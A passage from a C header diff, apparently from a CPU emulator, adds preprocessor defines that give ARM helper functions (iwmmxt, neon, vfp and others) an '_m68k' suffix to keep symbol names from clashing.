gen_helper_iwmmxt_maxuw gen_helper_iwmmxt_maxuw_m68k +#define gen_helper_iwmmxt_minsb 
gen_helper_iwmmxt_minsb_m68k +#define gen_helper_iwmmxt_minsl gen_helper_iwmmxt_minsl_m68k +#define gen_helper_iwmmxt_minsw gen_helper_iwmmxt_minsw_m68k +#define gen_helper_iwmmxt_minub gen_helper_iwmmxt_minub_m68k +#define gen_helper_iwmmxt_minul gen_helper_iwmmxt_minul_m68k +#define gen_helper_iwmmxt_minuw gen_helper_iwmmxt_minuw_m68k +#define gen_helper_iwmmxt_msbb gen_helper_iwmmxt_msbb_m68k +#define gen_helper_iwmmxt_msbl gen_helper_iwmmxt_msbl_m68k +#define gen_helper_iwmmxt_msbw gen_helper_iwmmxt_msbw_m68k +#define gen_helper_iwmmxt_muladdsl gen_helper_iwmmxt_muladdsl_m68k +#define gen_helper_iwmmxt_muladdsw gen_helper_iwmmxt_muladdsw_m68k +#define gen_helper_iwmmxt_muladdswl gen_helper_iwmmxt_muladdswl_m68k +#define gen_helper_iwmmxt_mulshw gen_helper_iwmmxt_mulshw_m68k +#define gen_helper_iwmmxt_mulslw gen_helper_iwmmxt_mulslw_m68k +#define gen_helper_iwmmxt_muluhw gen_helper_iwmmxt_muluhw_m68k +#define gen_helper_iwmmxt_mululw gen_helper_iwmmxt_mululw_m68k +#define gen_helper_iwmmxt_packsl gen_helper_iwmmxt_packsl_m68k +#define gen_helper_iwmmxt_packsq gen_helper_iwmmxt_packsq_m68k +#define gen_helper_iwmmxt_packsw gen_helper_iwmmxt_packsw_m68k +#define gen_helper_iwmmxt_packul gen_helper_iwmmxt_packul_m68k +#define gen_helper_iwmmxt_packuq gen_helper_iwmmxt_packuq_m68k +#define gen_helper_iwmmxt_packuw gen_helper_iwmmxt_packuw_m68k +#define gen_helper_iwmmxt_rorl gen_helper_iwmmxt_rorl_m68k +#define gen_helper_iwmmxt_rorq gen_helper_iwmmxt_rorq_m68k +#define gen_helper_iwmmxt_rorw gen_helper_iwmmxt_rorw_m68k +#define gen_helper_iwmmxt_sadb gen_helper_iwmmxt_sadb_m68k +#define gen_helper_iwmmxt_sadw gen_helper_iwmmxt_sadw_m68k +#define gen_helper_iwmmxt_setpsr_nz gen_helper_iwmmxt_setpsr_nz_m68k +#define gen_helper_iwmmxt_shufh gen_helper_iwmmxt_shufh_m68k +#define gen_helper_iwmmxt_slll gen_helper_iwmmxt_slll_m68k +#define gen_helper_iwmmxt_sllq gen_helper_iwmmxt_sllq_m68k +#define gen_helper_iwmmxt_sllw gen_helper_iwmmxt_sllw_m68k +#define 
gen_helper_iwmmxt_sral gen_helper_iwmmxt_sral_m68k +#define gen_helper_iwmmxt_sraq gen_helper_iwmmxt_sraq_m68k +#define gen_helper_iwmmxt_sraw gen_helper_iwmmxt_sraw_m68k +#define gen_helper_iwmmxt_srll gen_helper_iwmmxt_srll_m68k +#define gen_helper_iwmmxt_srlq gen_helper_iwmmxt_srlq_m68k +#define gen_helper_iwmmxt_srlw gen_helper_iwmmxt_srlw_m68k +#define gen_helper_iwmmxt_subnb gen_helper_iwmmxt_subnb_m68k +#define gen_helper_iwmmxt_subnl gen_helper_iwmmxt_subnl_m68k +#define gen_helper_iwmmxt_subnw gen_helper_iwmmxt_subnw_m68k +#define gen_helper_iwmmxt_subsb gen_helper_iwmmxt_subsb_m68k +#define gen_helper_iwmmxt_subsl gen_helper_iwmmxt_subsl_m68k +#define gen_helper_iwmmxt_subsw gen_helper_iwmmxt_subsw_m68k +#define gen_helper_iwmmxt_subub gen_helper_iwmmxt_subub_m68k +#define gen_helper_iwmmxt_subul gen_helper_iwmmxt_subul_m68k +#define gen_helper_iwmmxt_subuw gen_helper_iwmmxt_subuw_m68k +#define gen_helper_iwmmxt_unpackhb gen_helper_iwmmxt_unpackhb_m68k +#define gen_helper_iwmmxt_unpackhl gen_helper_iwmmxt_unpackhl_m68k +#define gen_helper_iwmmxt_unpackhsb gen_helper_iwmmxt_unpackhsb_m68k +#define gen_helper_iwmmxt_unpackhsl gen_helper_iwmmxt_unpackhsl_m68k +#define gen_helper_iwmmxt_unpackhsw gen_helper_iwmmxt_unpackhsw_m68k +#define gen_helper_iwmmxt_unpackhub gen_helper_iwmmxt_unpackhub_m68k +#define gen_helper_iwmmxt_unpackhul gen_helper_iwmmxt_unpackhul_m68k +#define gen_helper_iwmmxt_unpackhuw gen_helper_iwmmxt_unpackhuw_m68k +#define gen_helper_iwmmxt_unpackhw gen_helper_iwmmxt_unpackhw_m68k +#define gen_helper_iwmmxt_unpacklb gen_helper_iwmmxt_unpacklb_m68k +#define gen_helper_iwmmxt_unpackll gen_helper_iwmmxt_unpackll_m68k +#define gen_helper_iwmmxt_unpacklsb gen_helper_iwmmxt_unpacklsb_m68k +#define gen_helper_iwmmxt_unpacklsl gen_helper_iwmmxt_unpacklsl_m68k +#define gen_helper_iwmmxt_unpacklsw gen_helper_iwmmxt_unpacklsw_m68k +#define gen_helper_iwmmxt_unpacklub gen_helper_iwmmxt_unpacklub_m68k +#define gen_helper_iwmmxt_unpacklul 
gen_helper_iwmmxt_unpacklul_m68k +#define gen_helper_iwmmxt_unpackluw gen_helper_iwmmxt_unpackluw_m68k +#define gen_helper_iwmmxt_unpacklw gen_helper_iwmmxt_unpacklw_m68k +#define gen_helper_neon_abd_f32 gen_helper_neon_abd_f32_m68k +#define gen_helper_neon_abdl_s16 gen_helper_neon_abdl_s16_m68k +#define gen_helper_neon_abdl_s32 gen_helper_neon_abdl_s32_m68k +#define gen_helper_neon_abdl_s64 gen_helper_neon_abdl_s64_m68k +#define gen_helper_neon_abdl_u16 gen_helper_neon_abdl_u16_m68k +#define gen_helper_neon_abdl_u32 gen_helper_neon_abdl_u32_m68k +#define gen_helper_neon_abdl_u64 gen_helper_neon_abdl_u64_m68k +#define gen_helper_neon_abd_s16 gen_helper_neon_abd_s16_m68k +#define gen_helper_neon_abd_s32 gen_helper_neon_abd_s32_m68k +#define gen_helper_neon_abd_s8 gen_helper_neon_abd_s8_m68k +#define gen_helper_neon_abd_u16 gen_helper_neon_abd_u16_m68k +#define gen_helper_neon_abd_u32 gen_helper_neon_abd_u32_m68k +#define gen_helper_neon_abd_u8 gen_helper_neon_abd_u8_m68k +#define gen_helper_neon_abs_s16 gen_helper_neon_abs_s16_m68k +#define gen_helper_neon_abs_s8 gen_helper_neon_abs_s8_m68k +#define gen_helper_neon_acge_f32 gen_helper_neon_acge_f32_m68k +#define gen_helper_neon_acgt_f32 gen_helper_neon_acgt_f32_m68k +#define gen_helper_neon_addl_saturate_s32 gen_helper_neon_addl_saturate_s32_m68k +#define gen_helper_neon_addl_saturate_s64 gen_helper_neon_addl_saturate_s64_m68k +#define gen_helper_neon_addl_u16 gen_helper_neon_addl_u16_m68k +#define gen_helper_neon_addl_u32 gen_helper_neon_addl_u32_m68k +#define gen_helper_neon_add_u16 gen_helper_neon_add_u16_m68k +#define gen_helper_neon_add_u8 gen_helper_neon_add_u8_m68k +#define gen_helper_neon_ceq_f32 gen_helper_neon_ceq_f32_m68k +#define gen_helper_neon_ceq_u16 gen_helper_neon_ceq_u16_m68k +#define gen_helper_neon_ceq_u32 gen_helper_neon_ceq_u32_m68k +#define gen_helper_neon_ceq_u8 gen_helper_neon_ceq_u8_m68k +#define gen_helper_neon_cge_f32 gen_helper_neon_cge_f32_m68k +#define gen_helper_neon_cge_s16 
gen_helper_neon_cge_s16_m68k +#define gen_helper_neon_cge_s32 gen_helper_neon_cge_s32_m68k +#define gen_helper_neon_cge_s8 gen_helper_neon_cge_s8_m68k +#define gen_helper_neon_cge_u16 gen_helper_neon_cge_u16_m68k +#define gen_helper_neon_cge_u32 gen_helper_neon_cge_u32_m68k +#define gen_helper_neon_cge_u8 gen_helper_neon_cge_u8_m68k +#define gen_helper_neon_cgt_f32 gen_helper_neon_cgt_f32_m68k +#define gen_helper_neon_cgt_s16 gen_helper_neon_cgt_s16_m68k +#define gen_helper_neon_cgt_s32 gen_helper_neon_cgt_s32_m68k +#define gen_helper_neon_cgt_s8 gen_helper_neon_cgt_s8_m68k +#define gen_helper_neon_cgt_u16 gen_helper_neon_cgt_u16_m68k +#define gen_helper_neon_cgt_u32 gen_helper_neon_cgt_u32_m68k +#define gen_helper_neon_cgt_u8 gen_helper_neon_cgt_u8_m68k +#define gen_helper_neon_cls_s16 gen_helper_neon_cls_s16_m68k +#define gen_helper_neon_cls_s32 gen_helper_neon_cls_s32_m68k +#define gen_helper_neon_cls_s8 gen_helper_neon_cls_s8_m68k +#define gen_helper_neon_clz_u16 gen_helper_neon_clz_u16_m68k +#define gen_helper_neon_clz_u8 gen_helper_neon_clz_u8_m68k +#define gen_helper_neon_cnt_u8 gen_helper_neon_cnt_u8_m68k +#define gen_helper_neon_fcvt_f16_to_f32 gen_helper_neon_fcvt_f16_to_f32_m68k +#define gen_helper_neon_fcvt_f32_to_f16 gen_helper_neon_fcvt_f32_to_f16_m68k +#define gen_helper_neon_hadd_s16 gen_helper_neon_hadd_s16_m68k +#define gen_helper_neon_hadd_s32 gen_helper_neon_hadd_s32_m68k +#define gen_helper_neon_hadd_s8 gen_helper_neon_hadd_s8_m68k +#define gen_helper_neon_hadd_u16 gen_helper_neon_hadd_u16_m68k +#define gen_helper_neon_hadd_u32 gen_helper_neon_hadd_u32_m68k +#define gen_helper_neon_hadd_u8 gen_helper_neon_hadd_u8_m68k +#define gen_helper_neon_hsub_s16 gen_helper_neon_hsub_s16_m68k +#define gen_helper_neon_hsub_s32 gen_helper_neon_hsub_s32_m68k +#define gen_helper_neon_hsub_s8 gen_helper_neon_hsub_s8_m68k +#define gen_helper_neon_hsub_u16 gen_helper_neon_hsub_u16_m68k +#define gen_helper_neon_hsub_u32 gen_helper_neon_hsub_u32_m68k +#define 
gen_helper_neon_hsub_u8 gen_helper_neon_hsub_u8_m68k +#define gen_helper_neon_max_s16 gen_helper_neon_max_s16_m68k +#define gen_helper_neon_max_s32 gen_helper_neon_max_s32_m68k +#define gen_helper_neon_max_s8 gen_helper_neon_max_s8_m68k +#define gen_helper_neon_max_u16 gen_helper_neon_max_u16_m68k +#define gen_helper_neon_max_u32 gen_helper_neon_max_u32_m68k +#define gen_helper_neon_max_u8 gen_helper_neon_max_u8_m68k +#define gen_helper_neon_min_s16 gen_helper_neon_min_s16_m68k +#define gen_helper_neon_min_s32 gen_helper_neon_min_s32_m68k +#define gen_helper_neon_min_s8 gen_helper_neon_min_s8_m68k +#define gen_helper_neon_min_u16 gen_helper_neon_min_u16_m68k +#define gen_helper_neon_min_u32 gen_helper_neon_min_u32_m68k +#define gen_helper_neon_min_u8 gen_helper_neon_min_u8_m68k +#define gen_helper_neon_mull_p8 gen_helper_neon_mull_p8_m68k +#define gen_helper_neon_mull_s16 gen_helper_neon_mull_s16_m68k +#define gen_helper_neon_mull_s8 gen_helper_neon_mull_s8_m68k +#define gen_helper_neon_mull_u16 gen_helper_neon_mull_u16_m68k +#define gen_helper_neon_mull_u8 gen_helper_neon_mull_u8_m68k +#define gen_helper_neon_mul_p8 gen_helper_neon_mul_p8_m68k +#define gen_helper_neon_mul_u16 gen_helper_neon_mul_u16_m68k +#define gen_helper_neon_mul_u8 gen_helper_neon_mul_u8_m68k +#define gen_helper_neon_narrow_high_u16 gen_helper_neon_narrow_high_u16_m68k +#define gen_helper_neon_narrow_high_u8 gen_helper_neon_narrow_high_u8_m68k +#define gen_helper_neon_narrow_round_high_u16 gen_helper_neon_narrow_round_high_u16_m68k +#define gen_helper_neon_narrow_round_high_u8 gen_helper_neon_narrow_round_high_u8_m68k +#define gen_helper_neon_narrow_sat_s16 gen_helper_neon_narrow_sat_s16_m68k +#define gen_helper_neon_narrow_sat_s32 gen_helper_neon_narrow_sat_s32_m68k +#define gen_helper_neon_narrow_sat_s8 gen_helper_neon_narrow_sat_s8_m68k +#define gen_helper_neon_narrow_sat_u16 gen_helper_neon_narrow_sat_u16_m68k +#define gen_helper_neon_narrow_sat_u32 gen_helper_neon_narrow_sat_u32_m68k 
+#define gen_helper_neon_narrow_sat_u8 gen_helper_neon_narrow_sat_u8_m68k +#define gen_helper_neon_narrow_u16 gen_helper_neon_narrow_u16_m68k +#define gen_helper_neon_narrow_u8 gen_helper_neon_narrow_u8_m68k +#define gen_helper_neon_negl_u16 gen_helper_neon_negl_u16_m68k +#define gen_helper_neon_negl_u32 gen_helper_neon_negl_u32_m68k +#define gen_helper_neon_paddl_u16 gen_helper_neon_paddl_u16_m68k +#define gen_helper_neon_paddl_u32 gen_helper_neon_paddl_u32_m68k +#define gen_helper_neon_padd_u16 gen_helper_neon_padd_u16_m68k +#define gen_helper_neon_padd_u8 gen_helper_neon_padd_u8_m68k +#define gen_helper_neon_pmax_s16 gen_helper_neon_pmax_s16_m68k +#define gen_helper_neon_pmax_s8 gen_helper_neon_pmax_s8_m68k +#define gen_helper_neon_pmax_u16 gen_helper_neon_pmax_u16_m68k +#define gen_helper_neon_pmax_u8 gen_helper_neon_pmax_u8_m68k +#define gen_helper_neon_pmin_s16 gen_helper_neon_pmin_s16_m68k +#define gen_helper_neon_pmin_s8 gen_helper_neon_pmin_s8_m68k +#define gen_helper_neon_pmin_u16 gen_helper_neon_pmin_u16_m68k +#define gen_helper_neon_pmin_u8 gen_helper_neon_pmin_u8_m68k +#define gen_helper_neon_pmull_64_hi gen_helper_neon_pmull_64_hi_m68k +#define gen_helper_neon_pmull_64_lo gen_helper_neon_pmull_64_lo_m68k +#define gen_helper_neon_qabs_s16 gen_helper_neon_qabs_s16_m68k +#define gen_helper_neon_qabs_s32 gen_helper_neon_qabs_s32_m68k +#define gen_helper_neon_qabs_s8 gen_helper_neon_qabs_s8_m68k +#define gen_helper_neon_qadd_s16 gen_helper_neon_qadd_s16_m68k +#define gen_helper_neon_qadd_s32 gen_helper_neon_qadd_s32_m68k +#define gen_helper_neon_qadd_s64 gen_helper_neon_qadd_s64_m68k +#define gen_helper_neon_qadd_s8 gen_helper_neon_qadd_s8_m68k +#define gen_helper_neon_qadd_u16 gen_helper_neon_qadd_u16_m68k +#define gen_helper_neon_qadd_u32 gen_helper_neon_qadd_u32_m68k +#define gen_helper_neon_qadd_u64 gen_helper_neon_qadd_u64_m68k +#define gen_helper_neon_qadd_u8 gen_helper_neon_qadd_u8_m68k +#define gen_helper_neon_qdmulh_s16 
gen_helper_neon_qdmulh_s16_m68k +#define gen_helper_neon_qdmulh_s32 gen_helper_neon_qdmulh_s32_m68k +#define gen_helper_neon_qneg_s16 gen_helper_neon_qneg_s16_m68k +#define gen_helper_neon_qneg_s32 gen_helper_neon_qneg_s32_m68k +#define gen_helper_neon_qneg_s8 gen_helper_neon_qneg_s8_m68k +#define gen_helper_neon_qrdmulh_s16 gen_helper_neon_qrdmulh_s16_m68k +#define gen_helper_neon_qrdmulh_s32 gen_helper_neon_qrdmulh_s32_m68k +#define gen_helper_neon_qrshl_s16 gen_helper_neon_qrshl_s16_m68k +#define gen_helper_neon_qrshl_s32 gen_helper_neon_qrshl_s32_m68k +#define gen_helper_neon_qrshl_s64 gen_helper_neon_qrshl_s64_m68k +#define gen_helper_neon_qrshl_s8 gen_helper_neon_qrshl_s8_m68k +#define gen_helper_neon_qrshl_u16 gen_helper_neon_qrshl_u16_m68k +#define gen_helper_neon_qrshl_u32 gen_helper_neon_qrshl_u32_m68k +#define gen_helper_neon_qrshl_u64 gen_helper_neon_qrshl_u64_m68k +#define gen_helper_neon_qrshl_u8 gen_helper_neon_qrshl_u8_m68k +#define gen_helper_neon_qshl_s16 gen_helper_neon_qshl_s16_m68k +#define gen_helper_neon_qshl_s32 gen_helper_neon_qshl_s32_m68k +#define gen_helper_neon_qshl_s64 gen_helper_neon_qshl_s64_m68k +#define gen_helper_neon_qshl_s8 gen_helper_neon_qshl_s8_m68k +#define gen_helper_neon_qshl_u16 gen_helper_neon_qshl_u16_m68k +#define gen_helper_neon_qshl_u32 gen_helper_neon_qshl_u32_m68k +#define gen_helper_neon_qshl_u64 gen_helper_neon_qshl_u64_m68k +#define gen_helper_neon_qshl_u8 gen_helper_neon_qshl_u8_m68k +#define gen_helper_neon_qshlu_s16 gen_helper_neon_qshlu_s16_m68k +#define gen_helper_neon_qshlu_s32 gen_helper_neon_qshlu_s32_m68k +#define gen_helper_neon_qshlu_s64 gen_helper_neon_qshlu_s64_m68k +#define gen_helper_neon_qshlu_s8 gen_helper_neon_qshlu_s8_m68k +#define gen_helper_neon_qsub_s16 gen_helper_neon_qsub_s16_m68k +#define gen_helper_neon_qsub_s32 gen_helper_neon_qsub_s32_m68k +#define gen_helper_neon_qsub_s64 gen_helper_neon_qsub_s64_m68k +#define gen_helper_neon_qsub_s8 gen_helper_neon_qsub_s8_m68k +#define 
gen_helper_neon_qsub_u16 gen_helper_neon_qsub_u16_m68k +#define gen_helper_neon_qsub_u32 gen_helper_neon_qsub_u32_m68k +#define gen_helper_neon_qsub_u64 gen_helper_neon_qsub_u64_m68k +#define gen_helper_neon_qsub_u8 gen_helper_neon_qsub_u8_m68k +#define gen_helper_neon_qunzip16 gen_helper_neon_qunzip16_m68k +#define gen_helper_neon_qunzip32 gen_helper_neon_qunzip32_m68k +#define gen_helper_neon_qunzip8 gen_helper_neon_qunzip8_m68k +#define gen_helper_neon_qzip16 gen_helper_neon_qzip16_m68k +#define gen_helper_neon_qzip32 gen_helper_neon_qzip32_m68k +#define gen_helper_neon_qzip8 gen_helper_neon_qzip8_m68k +#define gen_helper_neon_rhadd_s16 gen_helper_neon_rhadd_s16_m68k +#define gen_helper_neon_rhadd_s32 gen_helper_neon_rhadd_s32_m68k +#define gen_helper_neon_rhadd_s8 gen_helper_neon_rhadd_s8_m68k +#define gen_helper_neon_rhadd_u16 gen_helper_neon_rhadd_u16_m68k +#define gen_helper_neon_rhadd_u32 gen_helper_neon_rhadd_u32_m68k +#define gen_helper_neon_rhadd_u8 gen_helper_neon_rhadd_u8_m68k +#define gen_helper_neon_rshl_s16 gen_helper_neon_rshl_s16_m68k +#define gen_helper_neon_rshl_s32 gen_helper_neon_rshl_s32_m68k +#define gen_helper_neon_rshl_s64 gen_helper_neon_rshl_s64_m68k +#define gen_helper_neon_rshl_s8 gen_helper_neon_rshl_s8_m68k +#define gen_helper_neon_rshl_u16 gen_helper_neon_rshl_u16_m68k +#define gen_helper_neon_rshl_u32 gen_helper_neon_rshl_u32_m68k +#define gen_helper_neon_rshl_u64 gen_helper_neon_rshl_u64_m68k +#define gen_helper_neon_rshl_u8 gen_helper_neon_rshl_u8_m68k +#define gen_helper_neon_shl_s16 gen_helper_neon_shl_s16_m68k +#define gen_helper_neon_shl_s32 gen_helper_neon_shl_s32_m68k +#define gen_helper_neon_shl_s64 gen_helper_neon_shl_s64_m68k +#define gen_helper_neon_shl_s8 gen_helper_neon_shl_s8_m68k +#define gen_helper_neon_shl_u16 gen_helper_neon_shl_u16_m68k +#define gen_helper_neon_shl_u32 gen_helper_neon_shl_u32_m68k +#define gen_helper_neon_shl_u64 gen_helper_neon_shl_u64_m68k +#define gen_helper_neon_shl_u8 
gen_helper_neon_shl_u8_m68k +#define gen_helper_neon_subl_u16 gen_helper_neon_subl_u16_m68k +#define gen_helper_neon_subl_u32 gen_helper_neon_subl_u32_m68k +#define gen_helper_neon_sub_u16 gen_helper_neon_sub_u16_m68k +#define gen_helper_neon_sub_u8 gen_helper_neon_sub_u8_m68k +#define gen_helper_neon_tbl gen_helper_neon_tbl_m68k +#define gen_helper_neon_tst_u16 gen_helper_neon_tst_u16_m68k +#define gen_helper_neon_tst_u32 gen_helper_neon_tst_u32_m68k +#define gen_helper_neon_tst_u8 gen_helper_neon_tst_u8_m68k +#define gen_helper_neon_unarrow_sat16 gen_helper_neon_unarrow_sat16_m68k +#define gen_helper_neon_unarrow_sat32 gen_helper_neon_unarrow_sat32_m68k +#define gen_helper_neon_unarrow_sat8 gen_helper_neon_unarrow_sat8_m68k +#define gen_helper_neon_unzip16 gen_helper_neon_unzip16_m68k +#define gen_helper_neon_unzip8 gen_helper_neon_unzip8_m68k +#define gen_helper_neon_widen_s16 gen_helper_neon_widen_s16_m68k +#define gen_helper_neon_widen_s8 gen_helper_neon_widen_s8_m68k +#define gen_helper_neon_widen_u16 gen_helper_neon_widen_u16_m68k +#define gen_helper_neon_widen_u8 gen_helper_neon_widen_u8_m68k +#define gen_helper_neon_zip16 gen_helper_neon_zip16_m68k +#define gen_helper_neon_zip8 gen_helper_neon_zip8_m68k +#define gen_helper_pre_hvc gen_helper_pre_hvc_m68k +#define gen_helper_pre_smc gen_helper_pre_smc_m68k +#define gen_helper_qadd16 gen_helper_qadd16_m68k +#define gen_helper_qadd8 gen_helper_qadd8_m68k +#define gen_helper_qaddsubx gen_helper_qaddsubx_m68k +#define gen_helper_qsub16 gen_helper_qsub16_m68k +#define gen_helper_qsub8 gen_helper_qsub8_m68k +#define gen_helper_qsubaddx gen_helper_qsubaddx_m68k +#define gen_helper_rbit gen_helper_rbit_m68k +#define gen_helper_recpe_f32 gen_helper_recpe_f32_m68k +#define gen_helper_recpe_u32 gen_helper_recpe_u32_m68k +#define gen_helper_recps_f32 gen_helper_recps_f32_m68k +#define gen_helper_rintd gen_helper_rintd_m68k +#define gen_helper_rintd_exact gen_helper_rintd_exact_m68k +#define gen_helper_rints 
gen_helper_rints_m68k +#define gen_helper_rints_exact gen_helper_rints_exact_m68k +#define gen_helper_ror_cc gen_helper_ror_cc_m68k +#define gen_helper_rsqrte_f32 gen_helper_rsqrte_f32_m68k +#define gen_helper_rsqrte_u32 gen_helper_rsqrte_u32_m68k +#define gen_helper_rsqrts_f32 gen_helper_rsqrts_f32_m68k +#define gen_helper_sadd16 gen_helper_sadd16_m68k +#define gen_helper_sadd8 gen_helper_sadd8_m68k +#define gen_helper_saddsubx gen_helper_saddsubx_m68k +#define gen_helper_sar_cc gen_helper_sar_cc_m68k +#define gen_helper_sdiv gen_helper_sdiv_m68k +#define gen_helper_sel_flags gen_helper_sel_flags_m68k +#define gen_helper_set_cp_reg gen_helper_set_cp_reg_m68k +#define gen_helper_set_cp_reg64 gen_helper_set_cp_reg64_m68k +#define gen_helper_set_neon_rmode gen_helper_set_neon_rmode_m68k +#define gen_helper_set_r13_banked gen_helper_set_r13_banked_m68k +#define gen_helper_set_rmode gen_helper_set_rmode_m68k +#define gen_helper_set_user_reg gen_helper_set_user_reg_m68k +#define gen_helper_shadd16 gen_helper_shadd16_m68k +#define gen_helper_shadd8 gen_helper_shadd8_m68k +#define gen_helper_shaddsubx gen_helper_shaddsubx_m68k +#define gen_helper_shl_cc gen_helper_shl_cc_m68k +#define gen_helper_shr_cc gen_helper_shr_cc_m68k +#define gen_helper_shsub16 gen_helper_shsub16_m68k +#define gen_helper_shsub8 gen_helper_shsub8_m68k +#define gen_helper_shsubaddx gen_helper_shsubaddx_m68k +#define gen_helper_ssat gen_helper_ssat_m68k +#define gen_helper_ssat16 gen_helper_ssat16_m68k +#define gen_helper_ssub16 gen_helper_ssub16_m68k +#define gen_helper_ssub8 gen_helper_ssub8_m68k +#define gen_helper_ssubaddx gen_helper_ssubaddx_m68k +#define gen_helper_sub_saturate gen_helper_sub_saturate_m68k +#define gen_helper_sxtb16 gen_helper_sxtb16_m68k +#define gen_helper_uadd16 gen_helper_uadd16_m68k +#define gen_helper_uadd8 gen_helper_uadd8_m68k +#define gen_helper_uaddsubx gen_helper_uaddsubx_m68k +#define gen_helper_udiv gen_helper_udiv_m68k +#define gen_helper_uhadd16 
gen_helper_uhadd16_m68k +#define gen_helper_uhadd8 gen_helper_uhadd8_m68k +#define gen_helper_uhaddsubx gen_helper_uhaddsubx_m68k +#define gen_helper_uhsub16 gen_helper_uhsub16_m68k +#define gen_helper_uhsub8 gen_helper_uhsub8_m68k +#define gen_helper_uhsubaddx gen_helper_uhsubaddx_m68k +#define gen_helper_uqadd16 gen_helper_uqadd16_m68k +#define gen_helper_uqadd8 gen_helper_uqadd8_m68k +#define gen_helper_uqaddsubx gen_helper_uqaddsubx_m68k +#define gen_helper_uqsub16 gen_helper_uqsub16_m68k +#define gen_helper_uqsub8 gen_helper_uqsub8_m68k +#define gen_helper_uqsubaddx gen_helper_uqsubaddx_m68k +#define gen_helper_usad8 gen_helper_usad8_m68k +#define gen_helper_usat gen_helper_usat_m68k +#define gen_helper_usat16 gen_helper_usat16_m68k +#define gen_helper_usub16 gen_helper_usub16_m68k +#define gen_helper_usub8 gen_helper_usub8_m68k +#define gen_helper_usubaddx gen_helper_usubaddx_m68k +#define gen_helper_uxtb16 gen_helper_uxtb16_m68k +#define gen_helper_v7m_mrs gen_helper_v7m_mrs_m68k +#define gen_helper_v7m_msr gen_helper_v7m_msr_m68k +#define gen_helper_vfp_absd gen_helper_vfp_absd_m68k +#define gen_helper_vfp_abss gen_helper_vfp_abss_m68k +#define gen_helper_vfp_addd gen_helper_vfp_addd_m68k +#define gen_helper_vfp_adds gen_helper_vfp_adds_m68k +#define gen_helper_vfp_cmpd gen_helper_vfp_cmpd_m68k +#define gen_helper_vfp_cmped gen_helper_vfp_cmped_m68k +#define gen_helper_vfp_cmpes gen_helper_vfp_cmpes_m68k +#define gen_helper_vfp_cmps gen_helper_vfp_cmps_m68k +#define gen_helper_vfp_divd gen_helper_vfp_divd_m68k +#define gen_helper_vfp_divs gen_helper_vfp_divs_m68k +#define gen_helper_vfp_fcvtds gen_helper_vfp_fcvtds_m68k +#define gen_helper_vfp_fcvt_f16_to_f32 gen_helper_vfp_fcvt_f16_to_f32_m68k +#define gen_helper_vfp_fcvt_f16_to_f64 gen_helper_vfp_fcvt_f16_to_f64_m68k +#define gen_helper_vfp_fcvt_f32_to_f16 gen_helper_vfp_fcvt_f32_to_f16_m68k +#define gen_helper_vfp_fcvt_f64_to_f16 gen_helper_vfp_fcvt_f64_to_f16_m68k +#define gen_helper_vfp_fcvtsd 
gen_helper_vfp_fcvtsd_m68k +#define gen_helper_vfp_get_fpscr gen_helper_vfp_get_fpscr_m68k +#define gen_helper_vfp_maxnumd gen_helper_vfp_maxnumd_m68k +#define gen_helper_vfp_maxnums gen_helper_vfp_maxnums_m68k +#define gen_helper_vfp_maxs gen_helper_vfp_maxs_m68k +#define gen_helper_vfp_minnumd gen_helper_vfp_minnumd_m68k +#define gen_helper_vfp_minnums gen_helper_vfp_minnums_m68k +#define gen_helper_vfp_mins gen_helper_vfp_mins_m68k +#define gen_helper_vfp_muladdd gen_helper_vfp_muladdd_m68k +#define gen_helper_vfp_muladds gen_helper_vfp_muladds_m68k +#define gen_helper_vfp_muld gen_helper_vfp_muld_m68k +#define gen_helper_vfp_muls gen_helper_vfp_muls_m68k +#define gen_helper_vfp_negd gen_helper_vfp_negd_m68k +#define gen_helper_vfp_negs gen_helper_vfp_negs_m68k +#define gen_helper_vfp_set_fpscr gen_helper_vfp_set_fpscr_m68k +#define gen_helper_vfp_shtod gen_helper_vfp_shtod_m68k +#define gen_helper_vfp_shtos gen_helper_vfp_shtos_m68k +#define gen_helper_vfp_sitod gen_helper_vfp_sitod_m68k +#define gen_helper_vfp_sitos gen_helper_vfp_sitos_m68k +#define gen_helper_vfp_sltod gen_helper_vfp_sltod_m68k +#define gen_helper_vfp_sltos gen_helper_vfp_sltos_m68k +#define gen_helper_vfp_sqrtd gen_helper_vfp_sqrtd_m68k +#define gen_helper_vfp_sqrts gen_helper_vfp_sqrts_m68k +#define gen_helper_vfp_subd gen_helper_vfp_subd_m68k +#define gen_helper_vfp_subs gen_helper_vfp_subs_m68k +#define gen_helper_vfp_toshd_round_to_zero gen_helper_vfp_toshd_round_to_zero_m68k +#define gen_helper_vfp_toshs_round_to_zero gen_helper_vfp_toshs_round_to_zero_m68k +#define gen_helper_vfp_tosid gen_helper_vfp_tosid_m68k +#define gen_helper_vfp_tosis gen_helper_vfp_tosis_m68k +#define gen_helper_vfp_tosizd gen_helper_vfp_tosizd_m68k +#define gen_helper_vfp_tosizs gen_helper_vfp_tosizs_m68k +#define gen_helper_vfp_tosld gen_helper_vfp_tosld_m68k +#define gen_helper_vfp_tosld_round_to_zero gen_helper_vfp_tosld_round_to_zero_m68k +#define gen_helper_vfp_tosls gen_helper_vfp_tosls_m68k +#define 
gen_helper_vfp_tosls_round_to_zero gen_helper_vfp_tosls_round_to_zero_m68k +#define gen_helper_vfp_touhd_round_to_zero gen_helper_vfp_touhd_round_to_zero_m68k +#define gen_helper_vfp_touhs_round_to_zero gen_helper_vfp_touhs_round_to_zero_m68k +#define gen_helper_vfp_touid gen_helper_vfp_touid_m68k +#define gen_helper_vfp_touis gen_helper_vfp_touis_m68k +#define gen_helper_vfp_touizd gen_helper_vfp_touizd_m68k +#define gen_helper_vfp_touizs gen_helper_vfp_touizs_m68k +#define gen_helper_vfp_tould gen_helper_vfp_tould_m68k +#define gen_helper_vfp_tould_round_to_zero gen_helper_vfp_tould_round_to_zero_m68k +#define gen_helper_vfp_touls gen_helper_vfp_touls_m68k +#define gen_helper_vfp_touls_round_to_zero gen_helper_vfp_touls_round_to_zero_m68k +#define gen_helper_vfp_uhtod gen_helper_vfp_uhtod_m68k +#define gen_helper_vfp_uhtos gen_helper_vfp_uhtos_m68k +#define gen_helper_vfp_uitod gen_helper_vfp_uitod_m68k +#define gen_helper_vfp_uitos gen_helper_vfp_uitos_m68k +#define gen_helper_vfp_ultod gen_helper_vfp_ultod_m68k +#define gen_helper_vfp_ultos gen_helper_vfp_ultos_m68k +#define gen_helper_wfe gen_helper_wfe_m68k +#define gen_helper_wfi gen_helper_wfi_m68k +#define gen_hvc gen_hvc_m68k +#define gen_intermediate_code_internal gen_intermediate_code_internal_m68k +#define gen_intermediate_code_internal_a64 gen_intermediate_code_internal_a64_m68k +#define gen_iwmmxt_address 